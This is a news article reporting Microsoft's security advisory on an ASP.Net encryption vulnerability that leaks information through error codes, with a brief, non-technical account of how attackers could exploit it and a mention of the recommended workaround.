Microsoft confirms ASP.Net vulnerability

The company has warned that the framework's encryption system leaks cryptographic information through its error codes, although it says no actual exploit has been observed
Written by Jack Clark, Contributor

Microsoft has disclosed a major security vulnerability within ASP.Net, which affects all versions of the web-application framework.

On Friday Microsoft issued a security advisory saying that a vulnerability had been discovered in ASP.Net that could allow attackers to gain encrypted information and details of servers running the software.

"We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time," Microsoft wrote.

However, Microsoft recommends "that all customers immediately apply a workaround to prevent attackers from using this vulnerability against... ASP.Net applications", Scott Guthrie, a corporate vice president in Microsoft's developer division, wrote on his blog. Guthrie's blog details the workaround that customers can implement.

The vulnerability exploits certain aspects of how ASP.Net encrypts its information. Attackers can repeatedly send encyphered text to a web server and analyse the error codes returned, eventually piecing together enough information to decypher the text. Once an attacker achieves this, they can request and download files within the ASP.Net application and decrypt information sent through the application.

One example of an application that relies on ASP.Net and is affected by this exploit is enterprise collaboration platform SharePoint, according to Guthrie, who has been responding to queries on his blog.

Microsoft is working with its Microsoft Active Protections Program partners to gather information on the exploit, and will correct the root cause of the issue.

Editorial standards